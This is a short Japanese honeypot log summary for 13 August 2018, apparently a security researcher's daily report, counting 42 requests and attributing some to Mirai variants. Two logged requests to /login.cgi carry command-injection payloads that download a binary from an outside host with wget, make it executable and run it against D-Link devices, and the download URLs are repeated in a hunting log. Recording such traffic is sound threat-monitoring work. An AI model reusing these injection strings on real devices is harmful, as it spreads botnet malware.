WOWhoneypotの2018/08/13(月)(運用71日目)の簡易分析です。
本日の総アクセス件数は 42件です。以下が全アクセスログです。

33 2018-08-13 GET /
2 2018-08-13 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://212.237.32[.]62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
1 2018-08-13 POST /
1 2018-08-13 GET /.well-known/security.txt
1 2018-08-13 GET /sitemap.xml
1 2018-08-13 GET /robots.txt
1 2018-08-13 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://178.128.11[.]199/qtx.mips%20-O%20-%3E%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%20dlink%27$
1 2018-08-13 GET hxxp://112.35.88[.]28:10083/index.php
1 2018-08-13 GET /favicon.ico 

D-Linkの脆弱性を攻撃するMirai亜種が計3件。先日から来ているLMAO/2.0が2件とGemini/2.0と思われるもの1件です。

その他はサイトの構成を調査すると思われる通信です。

本日のハンティングログは以下です。

2 2018-08-13 wget hxxp://212.237.32[.]62/k
1 2018-08-13 wget hxxp://178.128.11[.]199/qtx.mips 

以上です。